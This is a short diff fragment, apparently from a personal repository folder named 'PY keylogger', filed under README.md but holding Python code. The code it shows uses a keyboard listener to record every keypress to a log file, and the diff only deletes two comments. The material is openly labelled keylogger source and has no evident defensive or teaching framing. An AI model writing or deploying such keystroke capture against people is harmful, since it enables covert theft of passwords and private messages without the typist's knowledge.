newt196/Python-rep/python/PY keylogger/README.md

             print("Shutting down keylogger...")
             return False

-        # Append the key press to the log file
         with open(log_file_path, 'a') as f:
             f.write(key_str)

     except Exception as e:
         print(f"Error: {e}")

-# Start the listener to capture keystrokes
 with keyboard.Listener(on_press=press) as listener:
     listener.join()